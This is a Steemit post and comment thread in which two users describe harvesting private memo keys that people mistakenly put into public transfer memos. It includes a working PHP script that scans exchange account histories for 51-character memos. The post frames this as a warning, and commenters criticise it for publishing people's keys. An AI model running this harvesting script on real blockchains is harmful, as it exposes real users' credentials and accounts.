We Just Hacked 82 Steemit Accounts With an Estimated ~$95,368 USD in Control, but We Are Good Guys...

in steemit •  2 years ago

My friend @ralphhovsepian and I (@davidk) got access to the private memo keys of 82 Steemit accounts while trying some of our scripts.

Notice:
- We did not hack the Steemit blockchain
- We did not steal any money
- We did not use any social engineering

This bug is not very well known, although many people are talking about it. It happens when you transfer STEEM or Steem Dollars and put your private memo key or your password in the memo field, which is public.

Here is how we did it:

- We used the new SteemPHP, which is located at https://github.com/davidkevork/steemphp

<?php
include './vendor/autoload.php';
use SteemPHP\SteemConnection;
$SteemConnection = new SteemConnection('https://steemd.steemit.com');
$account = 'bittrex';
// Read the account history in pages of 1000 operations, one output file per page
for ($i=0; $i < 86; $i++) {
    $collect = [];
    // Page 0 passes -1 as the third argument; later pages pass $i * 1000
    if ($i == 0) { $l = -1; } else { $l = $i * 1000; }
    $data = $SteemConnection->getAccountHistory($account, 1000, $l);
    foreach ($data as $key => $value) {
        // Only transfer operations carry a memo
        if ($value[1]['op'][0] == 'transfer') {
            // 51 characters is the length of a WIF-encoded private key
            if (strlen($value[1]['op'][1]['memo']) == 51) {
                $collect[] = $value[1]['op'][1]['from'].':'.$value[1]['op'][1]['to'].':'.$value[1]['op'][1]['memo'];
            }
        }
    }
    // Store the from:to:memo entries collected on this page
    file_put_contents($account.'_'.$i, serialize($collect));
}
?>

We analysed the entire trading history of bittrex, poloniex and blocktrades, which in total is over 50,000 transfers, and got access to 82 active private memo keys.

While we also found passwords and more private memo keys, the account owners have changed them.
Here is the list of the accounts with their private memo keys.

Everyone in the list is advised to be careful next time, warn their friends, change their passwords if possible, and make sure their account is no longer accessible with the memo key above.

inspired by @noisy

Crikey, this is a bit scary, gotta be alert!

@noisy, it sort of reminded me of your post

wow dollarvigilante is in the list

·

Lmfao

I don't get it. Why would I put my private memo key in a public field?

·

Some people think memo is for password and they put their private key/password there

·
·

I can't believe @dollarvigilante has done it too :]]]

·
·
·

I think you should not display their entire keys. You might not be a bad guy but somebody else might be and you're just giving them the keys...

·

their accounts can be accessed but all the money is safe as they can't use this key to transfer any money

·
·

sry for misinterpretation...

Man, please don't post people's passwords. You could just show them blurred out. Golos prolly has some of these same people on it, and those accounts are also now at risk.

I very much appreciate that you didn't take their money, and that you clearly intended to illuminate the problem so that people don't make this mistake anymore, or at least less often.

But, find a way to not dox these folks when you post about the problem.

Thanks!

·

these are not the passwords, they are just keys which you can use for login but not to upvote/comment/resteem or transfer any money

·
·

Yeah, those. Please don't publish those.

How careless to send private keys in a memo!